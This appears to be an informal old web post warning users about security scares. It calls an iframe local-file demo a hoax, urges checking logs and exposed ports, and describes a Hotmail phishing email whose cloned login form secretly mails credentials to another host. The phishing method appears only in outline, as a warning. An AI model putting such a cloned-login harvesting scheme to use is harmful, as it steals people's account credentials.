so is this really a danger?..nope..what in effect happens is that _your_ browser gets told to act as a local file browser...by the local user...you...in other words, you can see it, no one else can (unless you got some other bug going on). you can get much the same result by going to (in msie) file menu, open, browse, and opening for instance c:\autoexec.bat (same in netscape if i remember right)
the above iframe example was stolen from:http://www.security4.ch.vu
THEY use it to scare people (or try to) into buying their security software. HOAX!!!
i'm not saying don't purchase security software, hey use a good virus scanner, a good firewall BUT remember this, the most exploited security vunerability is in one place
*gosh* look at how everyone is listening up....that place is...
THE USER!!!
in effect, if the user refuses to choose good passwords (or don't know how to) refuses to spend at least a little time keeping up with what can and can't be done, expect them to be tricked, used abused and harrassed
end my personal rant
my ladyfriend also made an example of this too...she's got nicer explanations too
well are you? are you running netbios open to the internet? (port 137-139) or are you running icq webserver (port80) or an ftpd or another httpd? are you reading your logs?, i'm not saying sit down and read them as if they were the newest book from your favourite author, but reading the logs can be informative.
for instance: extract from logs
all these affect only M$ and some only NT / Win2K (possibly xp?) and IIS, still, they do scan, i get quite a few of them.
so are these scans a large security risk? not really (usually) unless you run a vunerable system, most people don't even bother tracking these down today because the users don't often know that their computer is being used to scan other computers, but i figured i'd put it in here even if it's not REALLY a fraud
still there are vunerabilities out there, so if you run a server, keep up to date on server and cgi vunerabilities, if you don't KNOW if you are running a server, find out, or ask someone to find out for you
there are "gold diggers" in hotmail land, gold diggers refer to people who send mails from spoofed or faked addresses (like support1@hotmail.com) or "staff" and similar and ask for your password and login..OR..alternatively they send a letter like the one i received in my "spam and throw" account....
it contained the subject "your account will be closed in 3 days"
the apparent sender (sender address) was support@hotmail.com
and the message body contained an error message and a login box...very similar to hotmail's own...in fact it was a copy of it..with a few modifications
one of these modifications being a formmail call to another host...
so why doth this matter?...well it'd mail the result to that host at the same time as it's logging you in again..that's why...
in effect you are logging in AND giving the sender of that mail your login and password
i'll put up a somewhat safe (note!!! that doesn't not mean that it is "safe"..just more so than the original) demo version of this